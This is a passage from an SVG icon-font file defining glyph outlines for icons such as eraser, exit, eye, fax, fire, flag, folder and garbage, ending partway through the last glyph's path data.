<glyph glyph-name="eraser" horiz-adv-x="1000" unicode="&#xef15;" d="M903 374c47 48 45 120-2 168-54 54-108 107-161 161-50 50-124 50-174 0-155-155-310-311-466-466-50-50-50-124 0-174 29-30 59-60 89-89 6-6 17-10 26-10 43-1 87-1 131-1 43 0 85 1 128 0 14 0 24 4 34 14 72 73 145 145 217 218 60 59 120 118 178 179z m-298-245l-58-58c-20-21-41-41-62-62-4-4-11-7-17-7-81-1-163 0-244 0-5 0-12 3-16 7-28 27-55 54-83 82-33 35-33 83 1 118 56 56 156 156 200 199 11 11 29 11 41 0l238-238c11-12 11-30 0-41z m-4-143h337v-26h-337v26z" />
<glyph glyph-name="error" horiz-adv-x="1000" unicode="&#xef16;" d="M800 170l-120-120-180 180-180-180-120 120 179 180-179 180 120 120 180-180 180 180 120-120-180-180 180-180z" />
<glyph glyph-name="excavator" horiz-adv-x="1000" unicode="&#xef17;" d="M937 449c-12 0-22 1-33 0-8-1-12 2-15 9-44 87-88 173-132 259-11 23-23 46-36 70-16-11-32-23-48-34-7-4-8-7-5-14 6-16 11-32 17-48-3-2-6-4-8-5-93-50-186-99-278-150-19-11-34-14-52 0-3 3-9 4-12 2-17-8-33-18-50-27 5-15 10-29 14-43 1-4 1-10-1-14-24-58-49-116-73-175-3-7-7-9-15-9-30 0-59-1-89 0-29 0-46-23-45-45 2-34 0-68 1-103 0-23 12-35 35-36 20 0 40 0 60 0h56c-17-17-20-37-16-57 5-21 16-30 37-30 45 0 91 0 137 0 19 0 35 6 43 24 9 19 5 41-9 57-1 1-3 3-5 6h14c46 0 91 0 136 1 23 0 32 9 32 32 0 47 0 94 0 140 0 6-2 12-5 17-19 30-38 60-57 89-4 6-8 8-15 8-40 0-81 0-121 0-4 0-8 0-12 0-1-5-1-8-1-10 0-31 0-61 0-91 0-3-4-9-6-9-31-1-62-1-95-1 2 4 3 7 4 10 33 62 65 125 98 187 3 5 10 9 16 10 80 24 159 47 239 70 28 8 56 16 84 24 28-41 54-81 84-119 25-31 37-64 32-104-1-15-2-27-14-38-6-6-10-14-16-20-7-9-5-17 0-27 4-7 7-16 9-24 2-8 3-15 4-24 2 1 4 2 5 4 27 27 52 56 80 81 21 19 30 40 27 68-2 29 0 59 0 89z m-518-110c3 0 6 1 8 1 26 0 51 0 76 0 5-1 11-4 13-8 17-25 33-50 48-77 5-9 3-20 5-32h-150c0 39 0 77 0 116z m201-316c-60 0-119 0-179 0-3 0-7-2-9-5-9-18-25-24-44-24-48 0-97 0-146 0-15 0-27 7-33 21-3 6-6 8-12 8-28 0-56 0-84 0-32-1-53-21-50-51 0-4 0-9 0-13 0-28 19-46 47-46h253v0h256c25 0 44 15 47 40 1 10 1 21-1 31-4 25-20 39-45 39z" />
<glyph glyph-name="exchange" horiz-adv-x="1000" unicode="&#xef18;" d="M549 317h-289l107 107c8 8 8 20 0 27l-45 45c-7 8-19 8-27 0l-227-227c-7-7-7-19 0-27l227-227c8-7 20-7 27 0l45 45c8 8 8 20 0 27l-115 116h297c11 0 19 8 19 19v76c0 10-8 19-19 19z m383 140l-227 227c-8 8-20 8-27 0l-45-45c-8-7-8-19 0-27l107-107h-289c-11 0-19-9-19-19v-76c0-11 8-19 19-19h297l-115-116c-8-7-8-19 0-27l45-45c7-7 19-7 27 0l227 227c7 8 7 20 0 27z" />
<glyph glyph-name="exclamation-circle" horiz-adv-x="1000" unicode="&#xef19;" d="M500 788c-242 0-437-196-437-438s195-438 437-438 438 196 438 438-196 438-438 438z m0-162c19 0 39-1 59-4l-8-370c-18-3-34-4-51-4-17 0-34 1-51 4l-8 370c20 3 39 4 59 4z m56-548c-20-2-38-4-56-4-18 0-37 2-56 4-3 19-4 37-4 56 0 18 1 37 4 56 19 2 37 4 55 4 19 0 37-2 56-4 4-19 5-38 5-56 0-18-1-37-4-56z" />
<glyph glyph-name="exclamation-square" horiz-adv-x="1000" unicode="&#xef1a;" d="M873 787h-745c-36 0-65-28-65-64v-746c0-36 29-64 65-64h745c36 0 65 28 65 64v746c0 36-29 64-65 64z m-373-161c19 0 39-1 59-4l-8-370c-17-3-34-4-51-4-17 0-34 1-51 4l-8 370c20 3 39 4 59 4z m56-548c-19-3-38-4-55-4-19 0-38 1-56 4-3 19-5 38-5 56s2 36 5 55c18 3 36 5 55 5 18 0 37-2 56-5 3-19 4-37 4-55 0-18-1-37-4-56z" />
<glyph glyph-name="exclamation-tringle" horiz-adv-x="1000" unicode="&#xef1b;" d="M937 4c-2 12-6 23-11 33-11 20-22 40-33 59-113 204-226 407-339 610-6 12-14 23-23 33-18 17-41 18-60 1-8-8-16-18-21-28-125-225-250-450-375-675-4-6-7-13-9-19-11-33 4-59 37-67 8-3 18-4 27-4h739c7 0 14 1 21 2 31 3 51 26 47 55z m-438 552c18 0 35-1 53-4l-7-327c-15-3-30-4-45-4-15 0-30 1-45 4l-7 327c18 2 34 4 51 4z m50-485c-17-2-33-4-49-4-16 0-33 2-49 4-3 17-4 33-4 49 0 16 1 33 4 50 16 2 32 4 48 4 17 0 33-2 50-4 3-17 4-33 4-49 0-17-1-33-4-50z" />
<glyph glyph-name="exclamation" horiz-adv-x="1000" unicode="&#xef1c;" d="M500 239c18 0 36 2 56 5l8 401c-21 4-43 5-64 5-21 0-42-1-63-5l8-401c18-4 37-5 55-5z m61-63c-21 3-41 5-61 5-20 0-40-2-60-5-3-21-5-41-5-61 0-20 2-40 5-60 20-3 41-5 60-5 20 0 40 2 61 5 3 20 4 41 4 61 0 19-1 39-4 60z" />
<glyph glyph-name="exit" horiz-adv-x="1000" unicode="&#xef1d;" d="M903 333c9 9 9 25 0 35l-286 294c-10 9-25 9-34 0l-57-59c-9-9-9-25 0-35l135-139h-364c-13 0-24-11-24-25v-98c0-14 11-25 24-25h374l-145-149c-9-10-9-26 0-35l57-59c9-9 24-9 34 0l286 295z m-485 333h-206v-632h206v-122h-267c-34 0-61 28-61 61v754c0 33 27 61 61 61h267v-122z" />
<glyph glyph-name="expand" horiz-adv-x="1000" unicode="&#xef1e;" d="M934 0c-2 20-5 40-7 60-3 21-5 42-8 62l-8 69c-1 4-1 7-2 12 0 2-2 3-4 3h-78c-2 0-4-1-4-3 1-28 2-57 3-87 0-2-1-3-2-2-1 0-2 1-2 1l-133 102-5 4c-2 1-3 2-4 2s-1 0-3-1c-13-7-26-14-39-21-7-4-15-8-22-12-2-1-2-3-1-4 23-19 45-38 67-57 22-19 44-38 66-57 2-1 3-2 2-2 0-1-2-1-4-1-47 4-94 7-141 10-2 0-4-1-5-3 0-1 0-2-1-3l-18-67 0-1c-1 0-1 0-1-1 0 0 2 0 4 0l25-2 61-5 55-4c18-2 35-3 53-5l44-3c20-2 40-3 59-5 11-1 22-1 33-2 3 0 6 0 9-1h11c2 0 4 1 4 2 0 1-1 3-1 5-1 6-2 11-3 17z m-515 5l-18 67c-1 1-1 2-1 3-1 2-3 4-5 3-47-3-94-6-141-10-2 0-4 0-4 1 0 0 1 1 2 3l66 56c23 19 45 38 67 57 1 1 1 3-1 4-7 4-15 8-22 12-13 7-26 14-39 21-1 1-3 1-3 1 0 0-2-1-3-2l-6-4-133-101c0-1-1-1-2-2-1-1-2 0-2 2 1 30 2 59 3 87 0 2-2 4-4 4h-78c-2 0-4-2-4-4 0-4-1-8-1-12l-9-69c-2-20-5-41-7-62-3-20-6-40-8-60-1-6-2-11-3-16 0-2 0-5 0-6 0 0 1-1 3-1h12c3 0 5 0 8 1 11 0 22 1 33 2 20 1 39 3 59 4 14 1 29 2 44 4l53 4c19 2 37 3 55 4l61 5c9 1 17 1 26 2 1 0 3 1 3 1 0 0 0 0 0 1-1 0-1 0-1 0z m162 690l18-67c1-1 1-2 1-3 1-2 3-4 5-3 47 3 94 6 141 10 2 0 4 0 4-1s-1-1-2-3l-66-56c-22-19-44-38-67-57-1-1-1-3 1-4 7-4 15-8 22-12 13-7 26-14 39-21 2-1 3-1 3-1s2 1 4 2l5 4 133 101c0 1 1 1 2 2 1 1 2 0 2-2-1-30-2-59-3-87 0-2 2-4 4-4h78c2 0 4 2 4 4 1 4 1 8 2 12l8 69c3 20 5 41 8 62 2 20 5 40 7 60 1 5 2 11 3 16 0 2 1 5 1 5 0 1-2 2-4 2h-12c-2 0-5-1-8-1-11 0-22-1-33-2-19-1-39-3-59-4-14-1-29-2-44-4l-53-4c-18-2-37-3-55-4l-61-5c-8-1-17-1-25-2-2 0-4-1-4-1 0 0 0 0 0-1 1 0 1 0 1 0z m-190 4l-61 5-55 4c-18 1-35 3-53 5l-44 3c-20 2-40 3-59 5-11 0-22 1-33 1-3 1-6 1-8 1h-12c-2 0-3 0-3-1 0-1 0-4 0-5 1-6 2-11 3-17 2-20 5-40 8-60 2-21 4-42 7-62l9-69c0-4 1-7 1-12 0-2 2-3 4-3h78c2 0 4 1 4 3-1 28-2 57-3 87 0 2 1 3 2 2 1 0 2-1 2-1l133-102 6-4c1-1 3-2 3-2 0 0 2 0 3 1l39 21c7 4 15 8 22 12 2 1 2 3 1 4-23 19-45 38-67 57-22 19-44 38-66 57-1 1-2 2-2 2 0 1 2 1 4 1 47-4 94-7 141-10 2 0 4 1 5 3 0 1 0 2 1 3l18 67 1 1c0 0 0 0 0 1 0 0-2 0-4 0-8 1-17 2-25 2z" />
<glyph glyph-name="external-link" horiz-adv-x="1000" unicode="&#xef1f;" d="M808 351h-67c-11 0-21-9-21-21v-280c0-12-9-21-21-21h-503c-12 0-21 9-21 21v505c0 12 9 21 21 21h280c12 0 21 9 21 21v65c0 12-9 21-21 21h-392c-12 0-21-9-21-21v-726c0-11 9-21 21-21h724c12 0 21 10 21 21v394c0 12-9 21-21 21z m16 433h-249c-8 0-15-7-15-15v-83c0-9 7-15 15-15h127c8 0 10-5 5-11l-212-211c-6-6-6-16 0-21l86-86c6-6 15-6 21 0l212 212c6 6 10 4 10-5v-128c0-8 7-15 15-15h84c8 0 15 7 15 15v363c0 0-114 0-114 0z" />
<glyph glyph-name="external" horiz-adv-x="1000" unicode="&#xef20;" d="M873 787h-746c-36 0-64-29-64-65v-744c0-36 28-65 64-65h746c36 0 65 29 65 65v744c0 36-29 65-65 65z m-66-495h-83c-8 0-15 7-15 15v127c0 8-4 10-10 4l-210-210c-6-6-15-6-21 0l-85 85c-6 6-6 15 0 21l209 210c6 5 4 10-4 10h-126c-8 0-15 7-15 15v82c0 9 7 15 15 15h343c9 0 17-7 17-16v-343c0-8-7-15-15-15z" />
<glyph glyph-name="eye-alt" horiz-adv-x="1000" unicode="&#xef21;" d="M473 684h54c3-1 6-2 9-2 39-3 77-12 113-26 130-47 235-128 322-234 39-48 38-97-1-145-54-67-118-123-190-169-59-38-122-67-192-82-20-4-41-7-61-10h-54c-3 1-7 2-10 2-33 3-66 10-98 21-137 46-247 131-338 241-15 18-25 39-27 62-2 34 12 61 33 86 55 66 119 121 192 167 61 38 125 67 196 81 17 3 35 5 52 8z m-182-334c0-115 94-208 208-209 115 0 209 94 209 209 0 114-94 208-208 208-115 0-209-93-209-208z m248 118c-41-35-51-72-26-107 24-36 61-40 111-13 5-42-31-96-77-114-53-22-114-4-147 41-35 46-34 108 2 152 33 42 94 60 137 41z" />
<glyph glyph-name="eye-blocked" horiz-adv-x="1000" unicode="&#xef22;" d="M937 319c-24 38-51 73-86 104-33 29-69 53-107 72l-63-76 1 0c52-24 96-56 131-98 3-4 5-7 1-12-58-69-135-110-229-129 54 32 85 76 85 134 0 26-6 49-18 70l-248-298c57-10 117-10 180 0 156 23 274 97 352 223 2 3 2 7 1 10z m-218 346l-105-127c-38 8-76 12-117 13-16-1-34-2-52-3-10-1-20-3-29-4-156-25-275-99-352-224-2-3-2-8 0-10 28-47 62-88 107-122 32-25 66-44 101-61l-42-50 51-43 489 589-51 42z m-279-252c21-1 39-16 41-35l-33-38c-2-1-5-1-7-1-24 0-41 16-41 36-1 21 18 38 40 38z m-229-131c-8 8-15 17-24 25-5 6-4 9 0 15 44 51 100 88 168 111 19 7 39 12 59 16-53-32-84-76-83-135 0-32 9-60 27-84l-23-27c-46 19-87 44-124 79z" />
<glyph glyph-name="eye-dropper" horiz-adv-x="1000" unicode="&#xef23;" d="M529 613c-19 19-37 37-55 55 18 18 36 36 55 55 2 2 5 2 6 0 27-28 55-56 84-87 2-1 5-1 6 1 4 5 7 9 11 13 33 34 67 68 101 101 34 34 75 46 120 30 46-16 73-50 80-98 5-40-12-72-39-100-36-35-71-72-106-108-1-1-1-1-2-2-1-2 0-4 1-6 29-28 58-56 86-84 2-1 2-4 0-6-18-19-36-36-53-53-2-2-4-2-6 0-20 20-40 40-61 61-2 2-5 2-7 0-2-2-4-4-6-6-151-150-301-301-452-452-10-10-21-15-36-15-53 1-105 1-158 1-25 0-36 10-36 35 0 55 1 109 0 163 0 11 4 20 11 28 61 62 122 124 183 187l263 268c3 4 6 8 10 12 2 2 2 5 0 7z m39-49c-119-122-238-244-358-367-2-2-2-5 0-7 41-44 82-88 122-131 2-2 5-2 6 0l368 367c2 2 2 5 0 7l-131 131c-2 2-5 2-7 0z" />
<glyph glyph-name="eye" horiz-adv-x="1000" unicode="&#xef24;" d="M497 586c138-2 256-42 354-128 35-30 62-65 86-103 1-3 1-8-1-10-78-126-196-201-352-224-154-23-293 12-413 103-45 33-80 75-107 121-2 3-2 8 0 10 77 126 196 199 351 225 10 1 20 3 30 3 18 2 36 2 52 3z m88-370c94 18 171 60 229 128 4 6 2 9-1 13-35 42-79 74-131 97-30 14-63 24-100 31 57-33 88-77 88-135-1-59-31-102-85-134z m-170 0c-54 32-84 75-85 134 0 58 31 102 84 135-20-5-40-10-59-16-68-23-124-60-168-112-4-5-5-9 0-14 9-8 16-18 24-26 56-53 125-86 204-101z m26 158c22 1 40 17 40 37 0 20-19 37-41 37-22 0-41-17-40-37 0-21 18-37 41-37z" />
<glyph glyph-name="favourite" horiz-adv-x="1000" unicode="&#xef25;" d="M230-64c2 30 5 58 7 86 5 62 10 123 16 184 2 16-4 26-14 38-58 65-115 131-172 197-1 1-2 2-4 4-1 2-1 4 2 4 28 7 54 13 81 20 63 14 126 29 189 43 9 3 15 7 20 15 46 77 92 154 138 231 1 2 3 4 4 7 2 2 4 2 5 0 8-12 15-24 22-35 40-68 81-135 122-203 4-5 12-11 18-13 90-21 180-42 271-63 2 0 3-2 2-4-2-2-3-4-4-6-60-69-120-138-179-208-4-4-6-11-6-16 7-83 15-166 22-249 1-9 2-19 3-31 0-2-1-3-4-3-4 2-7 3-10 4-81 34-163 69-244 103-10 5-18 4-28 0-80-35-161-69-241-103-4-2-8-3-12-5-3-1-4 1-4 3z" />
<glyph glyph-name="fax" horiz-adv-x="1000" unicode="&#xef26;" d="M911 534h-79c-4 0-7 4-7 8v238c0 4-4 8-8 8h-362c-4 0-7-4-7-8v-238c0-4-4-8-8-8h-132c-4 0-8-3-8-7v-574c0-4 4-7 8-7h603c5 0 8 3 8 7v574c0 4-3 7-8 7z m-405 201c0 4 3 7 7 7h254c4 0 7-3 7-7v-11c0-4-3-7-7-7h-253c-5 0-8 3-8 7 0 0 0 11 0 11z m0-67c0 4 3 8 7 8h254c4 0 7-4 7-8v-10c0-4-3-7-7-7h-253c-5 0-8 3-8 7v10z m0-62c0 4 3 8 7 8h254c4 0 7-3 7-8v-10c0-4-3-7-7-7h-253c-5 0-8 3-8 7v10z m-106-545c0-4-4-7-8-7h-26c-4 0-7 3-7 7v324c0 4 3 7 7 7h26c5 0 8-3 8-7l0-324z m148-3c0-4-4-7-8-7h-66c-4 0-7 3-7 7v65c0 4 3 8 7 8h66c4 0 8-3 8-8v-65z m0 133c0-4-4-8-8-8h-66c-4 0-7 3-7 8v65c0 4 3 7 7 7h66c4 0 8-3 8-7v-65z m0 126c0-4-4-8-8-8h-66c-4 0-7 4-7 8v65c0 4 3 7 7 7h66c4 0 8-3 8-7v-65z m150-259c0-4-4-7-8-7h-66c-4 0-8 3-8 7v65c0 4 4 8 8 8h66c4 0 8-3 8-8v-65z m0 133c0-4-4-8-8-8h-66c-4 0-8 3-8 8v65c0 4 4 7 8 7h66c4 0 8-3 8-7v-65z m0 126c0-4-4-8-8-8h-66c-4 0-8 4-8 8v65c0 4 4 7 8 7h66c4 0 8-3 8-7v-65z m150-259c0-4-4-7-8-7h-66c-4 0-8 3-8 7v65c0 4 4 8 8 8h66c4 0 8-3 8-8v-65z m0 133c0-4-4-8-8-8h-66c-4 0-8 3-8 8v65c0 4 4 7 8 7h66c4 0 8-3 8-7v-65z m0 126c0-4-4-8-8-8h-66c-4 0-8 4-8 8v65c0 4 4 7 8 7h66c4 0 8-3 8-7v-65z m24 124c0-4-3-7-7-7h-458c-4 0-7 3-7 7v49c0 4 3 7 7 7h33c4 0 8-3 8-7v-17c0-4 3-7 7-7h362c4 0 7 3 7 7v17c0 4 4 7 8 7h33c4 0 7-3 7-7l0-49z m-620 159h-153c-10 0-18-8-18-19v-650c0-10 8-19 18-19h153c11 0 19 9 19 19v650c0 11-8 19-19 19z" />
<glyph glyph-name="file-fill" horiz-adv-x="1000" unicode="&#xef27;" d="M778 658c-16 19-32 38-48 58-13 15-25 30-38 45-13 15-38 27-57 27h-401c-19 0-34-16-34-36v-804c0-20 15-35 34-35h532c19 0 34 15 34 35v648c0 19-10 47-22 62z" />
<glyph glyph-name="film" horiz-adv-x="1000" unicode="&#xef28;" d="M110 755v-810c0-18 15-33 33-33h714c18 0 33 15 33 33v810c0 18-15 33-33 33h-714c-18 0-33-15-33-33z m98-775c-18 0-33 15-33 33v1c0 18 15 33 33 33s32-15 32-33v-1c0-18-14-33-32-33z m0 135c-18 0-33 14-33 32v2c0 18 15 33 33 33s32-15 32-33v-2c0-18-14-32-32-32z m0 134c-18 0-33 15-33 33v2c0 18 15 33 33 33s32-15 32-33v-2c0-18-14-33-32-33z m0 135c-18 0-33 14-33 33v1c0 18 15 33 33 33s32-15 32-33v-1c0-19-14-33-32-33z m0 134c-18 0-33 15-33 33v2c0 18 15 33 33 33s32-15 32-33v-2c0-18-14-33-32-33z m0 135c-18 0-33 15-33 33v1c0 18 15 33 33 33s32-14 32-33v-1c0-18-14-33-32-33z m454-673h-324c-18 0-33 15-33 33v271c0 18 15 33 33 33h324c18 0 33-15 33-33v-271c0-18-15-33-33-33z m0 404h-324c-18 0-33 14-33 33v270c0 18 15 33 33 33h324c18 0 33-15 33-33v-271c0-18-15-32-33-32z m130-404c-18 0-32 15-32 33v1c0 18 14 33 32 33s33-15 33-33v-1c0-18-15-33-33-33z m0 135c-18 0-32 14-32 32v2c0 18 14 33 32 33s33-15 33-33v-2c0-18-15-32-33-32z m0 134c-18 0-32 15-32 33v2c0 18 14 33 32 33s33-15 33-33v-2c0-18-15-33-33-33z m0 135c-18 0-32 14-32 33v1c0 18 14 33 32 33s33-15 33-33v-1c0-19-15-33-33-33z m0 134c-18 0-32 15-32 33v2c0 18 14 33 32 33s33-15 33-33v-2c0-18-15-33-33-33z m0 135c-18 0-32 15-32 33v1c0 18 14 33 32 33s33-14 33-33v-1c0-18-15-33-33-33z" />
<glyph glyph-name="filter" horiz-adv-x="1000" unicode="&#xef29;" d="M395 374c9-10 14-23 14-36v-397c0-23 29-36 47-19l112 127c15 18 23 26 23 44v245c0 13 5 26 14 36l322 344c24 26 5 68-30 68h-793c-36 0-55-42-31-68l322-344z" />
<glyph glyph-name="fire-alt" horiz-adv-x="1000" unicode="&#xef2a;" d="M578 506c-5-72 31-122 66-173 57-81 94-145 40-260-25-53-61-90-118-118 5 10 7 16 10 21 51 102 34 195-31 286-30 41-37 90-26 140 8 38 28 71 59 104z m-253-221c13-49 44-83 76-116 25-26 51-51 74-78 51-58 17-148-34-179-2 49-36 73-69 100-39 33-79 67-82 123-3 52 11 102 35 150z m150-13c-28 52-38 105-18 159 13 36 39 67 58 101 49 87 30 188-52 255 9-66-15-118-49-167-6-9-12-17-19-26 0 0-214-242 77-406 0 0 36-20 57-51l0 0-1 3-53 132z" />
<glyph glyph-name="fire-burn" horiz-adv-x="1000" unicode="&#xef2b;" d="M342 140c-69 7-93 120-93 120s-31-250 151-332c-20 38-19 87 1 121 41 66 11 106 11 106 86-31 39-108 39-108s77 17 21 114c-55 97 8 139 8 139s-43-60 68-156l36-158c34 4 46 58 46 58s9-81-36-132c57 17 98 52 124 96 47 80 46 187 2 259l-2 4c-19 31-30 59-35 84-20 83 17 132 17 132-87-31-109-85-109-132 0-50 26-92 26-92s-74 17-84 92c-4 34 5 81 41 145 115 200-14 287-14 287s87-123-143-322c-45-40-76-76-96-110-78-134 21-215 21-215z" />
<glyph glyph-name="fire" horiz-adv-x="1000" unicode="&#xef2c;" d="M285-34h430v-54h-430v54z m75 107c21-22 43-41 72-51 6-2 11-3 17-3 1 0 13 0 13 0h74c8 0 33 19 55 44 16 18 32 36 40 45 24 26 39 59 52 92 36 97 42 195 15 294-18 64-49 123-94 156 1-5 2-29 4-33 9-24 16-48 15-73-2-27-11-50-29-69-13-13-28-10-37 6-2 3-4 8-5 12-2 16-5 33-6 49-3 48-12 95-32 139-23 49-58 84-108 101-19 6-37 8-57 0 2-1 3-2 5-3 30-25 51-56 56-97 5-32-1-62-12-91-17-44-36-87-55-130-21-44-40-89-50-138-8-39-11-78-3-118 10-52 34-96 70-132z" />
<glyph glyph-name="flag-alt-1" horiz-adv-x="1000" unicode="&#xef2d;" d="M813 647c-184 33-365 67-547 100l-7 36c0 3-3 5-6 4l-62-11c-3 0-5-3-4-6l153-854c0-2 3-4 6-4l62 12c3 0 5 3 4 6l-61 339c154 126 307 251 462 378z" />
<glyph glyph-name="flag-alt-2" horiz-adv-x="1000" unicode="&#xef2e;" d="M757 754c-2 13-7 28-30 31-175 26-304-136-477-118l-10 53c0 3-2 4-5 4l-58-10c-2-1-4-3-4-6l141-792c1-2 3-4 6-3l58 10c2 0 4 3 4 5l-59 331c175-22 306 143 482 117 14-3 24 4 21 17l-69 361z m-330-334c37 13 72 30 107 47 7-34 13-67 20-101-36-17-71-34-108-47l-19 101c-38-12-74-18-114-16l-22 113c40-2 76 4 114 16-6 33-13 66-19 100 37 13 73 30 108 47 7-33 13-66 19-99 36 17 71 33 109 46-7 33-13 67-19 100 36 11 70 16 108 14l19-100c-38 2-72-3-108-14 7-38 14-75 21-113-37-13-72-29-108-47l-22 114c-35-18-71-35-108-48l22-113z m236-7l-19 101c36 11 70 16 108 14l19-101c-38 2-71-3-108-14z" />
<glyph glyph-name="flag" horiz-adv-x="1000" unicode="&#xef2f;" d="M829 376c-23 132-47 263-70 394-1 7-5 10-11 11-65 15-127 3-188-21-43-17-86-37-129-55-42-17-86-30-132-29-18 1-36 3-54 5l-8 41c0 3-3 4-5 4l-58-10c-3-1-4-3-4-6l141-794c1-2 3-4 6-3l58 10c2 0 4 3 4 5l-61 342c60-12 118-4 174 19 47 18 92 39 138 58 46 18 92 31 142 28 19-1 38-4 58-6 0 2-1 5-1 7z" />
<glyph glyph-name="flame-torch" horiz-adv-x="1000" unicode="&#xef30;" d="M499 788c4-1 5-3 6-5 29-48 47-100 56-155 12-78-2-153-34-225-14-33-28-65-36-100-10-45-11-90 6-134l1-3c-3-2-5 0-8 1-50 30-99 63-139 106-29 30-51 64-61 105-11 49-2 95 22 139 18 32 41 61 63 90 27 34 52 68 70 107 0 1 1 1 3 3-1-19-4-36-8-52-10-37-28-71-44-105-12-25-23-51-28-79-3-18-2-36 4-54 2 12 4 24 8 35 11 34 30 64 50 94 18 29 36 57 51 87 23 45 31 92 19 141-1 1-1 2-1 4z m2-641c105 0 210 0 314 0 3 0 8 2 10-3 1-5-2-8-6-11-38-28-78-52-122-70-37-16-74-32-114-41-9-2-18-5-27-6-5-1-6-3-6-8 2-28 3-56 4-83 1-7 0-9-7-10-32-3-62-4-94 0-5 1-6 3-5 7 1 28 2 57 3 85 1 5 0 8-6 10-91 23-178 57-256 111-3 3-7 6-10 9-3 2-4 4-3 7 1 3 4 3 7 3h18c100 0 200 0 300 0z m-3 68c0 43 14 81 31 117 17 37 36 73 51 111 27 74 32 150 8 226-3 12-9 24-14 36-1 2-4 4-1 6 2 2 5 0 6-3 9-12 19-25 28-38 42-63 76-130 94-205 9-40 13-80 1-120-12-43-38-77-71-106-36-31-77-53-120-73-8-3-8 2-9 7-2 15-4 29-4 42z" />
<glyph glyph-name="flash-light" horiz-adv-x="1000" unicode="&#xef31;" d="M662 644h-324c-10 0-17-8-17-18v-73c0-2 0-4 1-6l0 0c1-2 2-4 3-5l0-1 77-93v-517c0-10 7-18 17-18h162c10 0 17 8 17 18v517l77 93c0 0 0 0 1 0 1 2 2 4 2 5l1 1c0 2 1 4 1 6v73c0 10-8 18-18 18z m-145-352c0-10-7-18-17-18-9 0-17 8-17 18v83c0 10 8 18 17 18 10 0 17-8 17-18v-83z m128 279h-290v37h290v-37z m-220 130c1-6 6-10 11-10 1 0 3 1 4 1 6 2 10 9 8 16l-17 59c-1 7-8 11-15 9-6-2-10-9-8-16l17-59z m75-1c7 0 12 5 12 12 0 1 1 18 1 63 0 7-6 13-13 13h0c-7 0-12-6-12-13 0-45 0-62 0-63 0-7 6-12 12-12z m60-8c1 0 3-1 4-1 5 0 10 4 12 10l16 59c2 7-1 14-8 16-7 2-13-2-15-9l-17-59c-2-7 2-14 8-16z" />
<glyph glyph-name="flash" horiz-adv-x="1000" unicode="&#xef32;" d="M484 392h256c-121-161-242-320-362-480l-2 1c44 120 87 239 132 361-83-4-164-7-248-11 123 176 245 350 367 525l2-1c-48-131-96-263-145-395z" />
<glyph glyph-name="flask" horiz-adv-x="1000" unicode="&#xef33;" d="M831 73c-59 83-119 167-178 250-14 20-29 41-43 61-3 4-5 9-5 14v359h12c9 0 17 7 17 15s-8 16-17 16h-235c-9 0-16-7-16-16s7-15 16-15h12v-359c0-5-2-10-5-14-14-20-28-41-42-61-60-83-119-167-178-251-22-31-25-65-9-99 20-42 54-61 97-61 81 0 162 1 243 2 81-1 162-2 243-2 43 0 77 19 97 61 16 34 13 68-9 100z" />
<glyph glyph-name="focus" horiz-adv-x="1000" unicode="&#xef34;" d="M860 416c-27 149-144 266-293 294v78h-131v-77c-150-27-269-145-296-295h-76v-132h76c27-150 146-268 296-295v-76h131v77c149 28 266 145 293 294h76v132h-76z m-360-330c-146 0-264 118-264 264s118 264 264 264c146 0 264-118 264-264s-118-264-264-264z m74 264c0-41-33-74-74-74s-74 33-74 74 33 74 74 74 74-33 74-74z" />
<glyph glyph-name="folder-open" horiz-adv-x="1000" unicode="&#xef35;" d="M713 469h180v71c0 30-24 55-55 55h-205l-18 33c-14 27-42 45-73 45h-380c-31 0-56-25-56-56v-148h607z m0-37h-650l43-352c0-29 25-53 56-53h676c30 0 55 24 55 53l45 352h-225z" />
<glyph glyph-name="folder" horiz-adv-x="1000" unicode="&#xef36;" d="M886 604h-328l-16 34c-14 29-40 47-69 47h-358c-29 0-52-26-52-58v-555c0-31 23-57 52-57h771c28 0 52 26 52 57v475c0 31-24 57-52 57z" />
<glyph glyph-name="foot-print" horiz-adv-x="1000" unicode="&#xef37;" d="M396 243c6 3 9 6 8 13 0 54 1 107 0 160 0 42-6 83-22 121-17 42-42 73-82 82-25 5-52 5-78 3-44-4-77-29-94-77-9-23-11-47-12-72-1-50 7-98 22-145 16-47 32-94 48-141 12 3 22 5 33 8 59 16 119 26 177 48z m484 434c-7 55-38 94-85 106-27 6-54 5-82 3-26-3-48-16-66-36-30-34-43-77-48-123-4-40-3-80-5-121l1 0v-88c0-4 0-8 5-10 18-5 35-13 52-17 51-13 101-25 151-38 8-2 11 0 14 7 15 47 32 93 47 139 18 58 24 117 16 178z m-458-519c-3 7-5 12-11 11-39-7-79-16-118-29-26-9-52-16-80-25 12-43 23-84 40-123 20-45 51-71 94-78 38-6 64 3 89 47 19 34 18 71 14 108-4 32-17 60-28 89z m186 168c-9 1-19 6-25 3-6-4-8-16-12-25-17-38-25-79-23-122 1-31 13-58 32-80 8-9 19-18 30-21 47-13 91 3 122 49 30 43 40 97 55 149-7 2-13 4-19 6-53 16-105 35-160 41z" />
<glyph glyph-name="garbage" horiz-adv-x="1000" unicode="&#xef38;" d="M809 728h-61c-8 0-15 7-15 16v27c0 44-36 79-79 79h-307c-44 0-79-35-79-79v-27c0-9-7-16-16-16h-61c-43 0-78-35-78-79v-59c0-8 7-15 15-15h744c9 0 16 7 16 15v59c0 44-35 79-79 79z m-139 16c0-9-7-16-16-16h-307c-9 0-16 7-16 16v27c0 9 7 16 16 16h307c9 0 16-7 16-16v-27z m187-218h-713c-17 0-30-14-28-31l62-614c2-17 17-31 35-31h574c18 0 33 14 35 31l63 614c2 17-11 31-28 31z m-364-469c0-9-7-16-16-16l-78 0c-9 0-20 6-26 12l-47 56c-5 7-7 19-4 27l6 15c3 8-1 17-9 21l-17 7c-8 3-8 7 1 9l63 11c9 2 20-2 25-9 10-15 27-38 38-53 5-7 2-10-6-7l-16 7c-8 3-15 3-17 1-1-3 3-10 9-17l4-5c5-6 17-12 25-12l49 0c9 0 16-7 16-15l0-32z m11 207l16 9c7 4 12 9 11 12-1 2-9 4-18 4h-6c-9 0-20-5-26-12l-31-38c-6-6-16-7-22-2l-24 21c-7 5-8 15-2 22l50 60c6 7 17 12 26 12h73c8 0 19-6 23-14l8-14c4-8 13-11 21-7 5 3 11 6 16 9 8 4 11 1 7-6l-32-56c-4-8-15-14-23-13-18 1-47 3-65 4-9 1-9 5-2 9z m180-152l-39-62c-5-7-15-13-24-12l-16 1c-9 0-16-6-17-15 0-6-1-12-1-18-1-9-5-10-9-2l-31 57c-4 7-3 19 2 26 10 15 27 38 38 52 5 7 9 6 8-3l-1-17c0-9 1-16 4-16 3-1 9 5 14 13l3 4c5 8 6 20 3 29l-15 46c-2 9 2 17 11 20l30 10c8 2 17-2 